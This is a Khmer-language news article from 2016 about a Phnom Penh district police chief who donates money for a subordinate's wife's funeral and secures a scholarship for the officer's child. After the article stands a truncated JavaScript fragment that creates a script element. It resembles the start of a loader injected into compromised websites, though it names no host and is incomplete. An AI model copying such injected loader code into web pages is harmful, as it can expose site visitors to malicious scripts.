មន្រ្តីនគរបាលម្នាក់ខ្វះខាតថវិការ ធ្វើបុណ្យសពភរិយា ទទួលបានការយកចិត្តទុកដាក់ពីលោកវរសេនីយ៍ឯក យឹម សារ៉ាន់

ភ្នំពេញ៖ នៅព្រឹកថ្ងៃទី២៣ ខែកញ្ញា ឆ្នាំ២០១៦ លោកវរសេនីយ៍ឯក យឹម សារ៉ាន់ អធិកានគរបាលខណ្ឌពោធិ៍សែនជ័យ ជួយឧបត្តម្ភប្រាក់ចំនួន ១លាន រៀល ដែល បានមកពីការជួយឧបត្តម្ភមន្រ្តីក្រោមឱវាទ ជូនលោក ញាណ សុខុម មន្រ្តីនគរបាលផ្នែកអន្តរាគមន៍ ព្រមទាំងបាន ស្នើរសុំអាហាររូបកណ៏ ជូនកូនមន្រ្តីខាងលើអោយបានរៀនរហូតបញ្ចប់ថ្នាក់បរិញ្ញាប័ត្រ ពី លោក ឈួន វណ្ណឡេង នាយករងវិទ្យាស្ថានជាតិពាណិជ្ជសាស្រ្តដោយមានការអាណិតអាសូរដល់មន្រ្តីខាងលើ លោកនាយករង បានការឯកភាព តាមការស្នើរសុំរបស់លោកអធិការភ្លាមៗផងដែរ នេះបង្ហាញអោយឃើញ ពីការយកចិត្តទុកដាក់ សុខទុក្ខ លំបាក របស់ថ្នាក់ដឹកនាំចំពោះមន្រ្តីក្រោមឱវាទ។

ហើយ លោកវរសេនីឯក យឹម សារ៉ាន់ លោក មិនមែនតែយកចិត្តទុកដាក់តែមន្ត្រីក្រោមឱវាទនោះទេ គឺលោក តែងតែជួយដល់ ជនក្រីក្រ ជួបនូវបញ្ហាខ្វះខាត ពេលជួបបញ្ហាអ្វីមួយ នៅក្នុងខណ្ឌ៕

var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More